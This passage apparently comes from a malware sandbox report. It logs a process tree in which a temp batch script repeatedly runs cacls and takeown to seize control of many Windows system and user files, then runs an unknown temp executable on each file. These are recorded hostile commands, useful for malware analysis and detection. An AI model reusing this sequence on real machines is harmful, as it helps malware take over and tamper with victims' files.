    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "000000A7.bin" -nobanner
    3⤵
    PID:7616
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "000000A7.bin" -nobanner
      4⤵
      PID:4148
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2960
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:3740
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:1740
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    - Modifies file permissions
    PID:4604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:4452
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:7624
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5252
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:6508
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5360
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    PID:6396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:6500
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:5568
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:6492
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:7888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    PID:7520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:7980
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:1392
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.f4ed466c-6388-46f0-a7a5-5a8359d9cc1d.1.etl""
  2⤵
  PID:3812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.f4ed466c-6388-46f0-a7a5-5a8359d9cc1d.1.etl" /E /G Admin:F /C
    3⤵
    PID:7884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.f4ed466c-6388-46f0-a7a5-5a8359d9cc1d.1.etl"
    3⤵
    PID:8152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "MoUsoCoreWorker.f4ed466c-6388-46f0-a7a5-5a8359d9cc1d.1.etl" -nobanner
    3⤵
    PID:6388
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "MoUsoCoreWorker.f4ed466c-6388-46f0-a7a5-5a8359d9cc1d.1.etl" -nobanner
      4⤵
      PID:7900
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:5372
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:7000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    PID:1172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:212
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:6532
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6524
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:8176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:8052
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:2232
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:1720
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""
  2⤵
  PID:7152
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C
    3⤵
    PID:7436
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"
    3⤵
    PID:6456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
    3⤵
    PID:6844
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
      4⤵
      PID:6604
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5604
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
  2⤵
  PID:1084
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C
    3⤵
    PID:6372
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
    3⤵
    PID:7140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "OfficeIntegrator.ps1" -nobanner
    3⤵
    PID:6440
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "OfficeIntegrator.ps1" -nobanner
      4⤵
      PID:7016
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:7356
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:5144
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Modifies file permissions
    PID:7184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:6784
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      PID:7576
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6776
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
  2⤵
  PID:7036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5244
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:5876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:7412
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      System Location Discovery: System Language Discovery
      PID:6856
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:8148
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:3156
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin""
  2⤵
  PID:6452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7656
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin"
    3⤵
    PID:7988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000000F.bin" -nobanner
    3⤵
    PID:5336
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000000F.bin" -nobanner
      4⤵
      PID:7664
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin""
  2⤵
  PID:6704
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin" /E /G Admin:F /C
    3⤵
    PID:7764
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin"
    3⤵
    PID:7784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000000Q.bin" -nobanner
    3⤵
    PID:5572
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000000Q.bin" -nobanner
      4⤵
      PID:7208
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin""
  2⤵
  PID:2824
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin" /E /G Admin:F /C
    3⤵
    PID:7940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000014.bin"
    3⤵
    PID:5064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000014.bin" -nobanner
    3⤵
    PID:2028
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000014.bin" -nobanner
      4⤵
      PID:5108
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin""
  2⤵
  PID:8040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin" /E /G Admin:F /C
    3⤵
    PID:4492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000058.bin"
    3⤵
    - Modifies file permissions
    PID:7976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000058.bin" -nobanner
    3⤵
    PID:3492
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000058.bin" -nobanner
      4⤵
      PID:2180
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4464
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin""
  2⤵
  PID:5292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin" /E /G Admin:F /C
    3⤵
    PID:6424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin"
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:7796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000007E.bin" -nobanner
    3⤵
    PID:5168
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000007E.bin" -nobanner
      4⤵
      PID:5328
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5484
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin""
  2⤵
  PID:5204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin" /E /G Admin:F /C
    3⤵
    PID:4332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin"
    3⤵
    PID:3324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000007O.bin" -nobanner
    3⤵
    PID:5172
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000007O.bin" -nobanner
      4⤵
      PID:6892
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7332
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin""
  2⤵
  PID:3536
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin" /E /G Admin:F /C
    3⤵
    PID:5304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin"
    3⤵
    PID:5284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000008D.bin" -nobanner
    3⤵
    PID:5444
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000008D.bin" -nobanner
      4⤵
      PID:3096
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2212
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin""
  2⤵
  PID:3352
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin" /E /G Admin:F /C
    3⤵
    PID:4172
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin"
    3⤵
    PID:6916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000008N.bin" -nobanner
    3⤵
    PID:4528
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000008N.bin" -nobanner
      4⤵
      PID:1896
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin""
  2⤵
  PID:5716
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin" /E /G Admin:F /C
    3⤵
    PID:6828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin"
    3⤵
    PID:5820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000093.bin" -nobanner
    3⤵
    PID:5900
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000093.bin" -nobanner
      4⤵
      PID:6684
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin""
  2⤵
  PID:1652
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin" /E /G Admin:F /C
    3⤵
    PID:5548
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A9.bin"
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "000000A9.bin" -nobanner
    3⤵
    PID:6004
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "000000A9.bin" -nobanner
      4⤵
      PID:6016
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6032
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.279050d9-6bd6-4f09-8faa-f9771de04e32.1.etl""
  2⤵
  PID:5552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.279050d9-6bd6-4f09-8faa-f9771de04e32.1.etl" /E /G Admin:F /C
    3⤵
    PID:4448
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.279050d9-6bd6-4f09-8faa-f9771de04e32.1.etl"
    3⤵
    - Modifies file permissions
    PID:2036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "UpdateSessionOrchestration.279050d9-6bd6-4f09-8faa-f9771de04e32.1.etl" -nobanner
    3⤵
    PID:3844
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "UpdateSessionOrchestration.279050d9-6bd6-4f09-8faa-f9771de04e32.1.etl" -nobanner
      4⤵
      PID:6952
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5540
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
  2⤵
  PID:5536
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C
    3⤵
    PID:4092
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"
    3⤵
    PID:6076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
    3⤵
    PID:6084
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
      4⤵
      PID:4380
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6040
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.504efc8c-f8c9-4a7f-bb86-9e5928fa8020.1.etl""
  2⤵
  PID:2520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.504efc8c-f8c9-4a7f-bb86-9e5928fa8020.1.etl" /E /G Admin:F /C
    3⤵
    PID:3560
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.504efc8c-f8c9-4a7f-bb86-9e5928fa8020.1.etl"
    3⤵
    - Modifies file permissions
    PID:4832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "UpdateSessionOrchestration.504efc8c-f8c9-4a7f-bb86-9e5928fa8020.1.etl" -nobanner
    3⤵
    PID:5028
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "UpdateSessionOrchestration.504efc8c-f8c9-4a7f-bb86-9e5928fa8020.1.etl" -nobanner
      4⤵
      PID:4940
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\cacls.exe
